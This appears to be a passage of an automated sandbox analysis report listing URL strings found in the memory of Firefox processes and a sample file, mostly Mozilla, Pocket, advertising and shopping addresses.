Source: firefox.exe, 00000021.00000003.3208062027.0000016DEE29F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197686918.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3201836603.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200386647.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s.zkcdn.net/Advertisers/8c6ba27004c947fdb8667ce4914d41c8.png
Source: firefox.exe, 00000021.00000003.3208062027.0000016DEE29F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197686918.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s.zkcdn.net/Advertisers/f85f50edcf894021a38860edd7f5438c.jpg
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/014e6dbb-9ecc-4f27-9818-4dcf4bca0f21.jp
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/ad78a6f9-e73d-465c-b7fd-7c8b261e5825.jp
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/affc9ba4-c42f-4a1a-a1ba-5f2cc290cee9.jp
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/b1da8a8e-07d7-4788-a750-b444d5b94049.jp
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/b2e82c42-fd94-454a-912f-56867d09ec8d.jp
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/cfaea8c3-6a2d-419a-ab01-87c07b38c434.jp
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/efeba65b-769c-4faa-91a0-91743b56b2e0.jp
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/104fa582-7bc3-4175-a738-da610
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/2f642ebf-706d-4eac-8c53-46182
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/3ab33190-fd52-43d4-b1c7-165bd
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/4ae36a64-11ed-4fe9-96d8-6635b
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/77a6038f-9efe-4c74-9997-ccaed
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210808240.0000016DEA8DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/93357493-c9be-45be-b688-1504d
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/94e6f6f5-07c6-4c89-9691-ae5e0
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/969c870d-52fb-4643-a2c6-ae026
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/ab3f4075-4d4a-449a-bc6c-f78fc
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/b0851f03-bfa3-4d86-8d0b-45de1
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/b3ad74ad-c02d-4e74-910b-d7bf8
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/b49da5a6-5bcb-4af7-8332-8c6c9
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210808240.0000016DEA8DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/d0421c03-3c25-4e3e-9a01-e064b
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/d32286dc-8c2d-4eee-bf06-5de73
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/d695e43b-7ddd-4866-ae35-cc2af
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/d88601ae-5293-43b2-9eaf-2ab6b
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/db27756e-0bc3-4e96-a2a4-07619
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/dce103d2-585c-4d15-b52f-bacce
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/e2b54588-ce1c-40e5-ba96-bbbff
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/e5658c7a-9e80-4d8a-a8f8-d6792
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/eb6f4611-95fa-41c2-9b30-a9294
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/ec024fdd-4e01-4a36-9b2c-4cbc1
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/f9b342d5-c87b-4c3e-a8c4-0609f
Source: firefox.exe, 00000021.00000003.3212471692.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128160260.0000016DDE27E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3221635085.0000016DE6BF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128160260.0000016DDE27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000021.00000003.3128160260.0000016DDE27E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE6762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B01512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE978E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B015BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: firefox.exe, 00000021.00000003.2866313930.0000016DDE1FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/inapp/
Source: firefox.exe, 00000021.00000003.2880752425.0000016DDF4D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2863559755.0000016DDF4D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000021.00000003.3112151980.0000016DDF9B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3111528462.0000016DDF9B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3112514927.0000016DDF9B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefox
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tiles-cdn.prod.ads.prod.webservices.mozgcp.net/CAP5k4gWqcBGwir7bEEmBWveLMtvldFu-y_kyO3txFA=.
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tiles-cdn.prod.ads.prod.webservices.mozgcp.net/m6BvG6Rcntmafem2bLfA5IktKm1SEwqO2E4XIjaC12c=.
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000021.00000003.3204676713.0000016DE9EA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tracking-protection.cdn.mozilla.net/mozplugin-block-digest256/1604686195
Source: firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000021.00000003.3163179964.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3142280599.0000016DE9D92000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120489863.0000016DE682F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000021.00000003.3208062027.0000016DEE29F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197686918.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3201836603.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200386647.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ww55.affinity.net/sssdomweb?enk=615ecace6a3595ad020f9474bd23f60e3f73697b86ff155204b57785384a
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221635085.0000016DE6BF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA318000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3163108384.0000016DE4B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_47ec4889599d44b137ae68c3ce4f270931c4c512d7b18608
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152391838.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3191939859.0000016DE9A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207334568.0000016DDE0B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3144642447.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3190357375.0000016DDE0B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3167800992.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2896976566.0000016DDE12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165602215.0000016DEA9EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166260392.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3161465579.0000016DE4BD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.com/future/article/20240724-the-day-the-internet-turned-off?utm_source=pocket-newtab
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211896336.0000016DEA822000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.befr.ebay.be/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211896336.0000016DEA822000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.befr.ebay.be/sch/
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.businessinsider.com/openai-searchgpt-search-engine-prototype-declares-war-with-google-20
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bustle.com/entertainment/how-to-watch-simone-biles-gymnastics-2024-paris-olympics?utm_so
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.context.news/socioeconomic-inclusion/olympic-refugee-team-leader-hopes-for-first-medal?u
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.dwell.com/article/paris-2024-summer-olympic-games-village-002bb1a9?utm_source=pocket-new
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.at/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.at/sch/
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.ca/
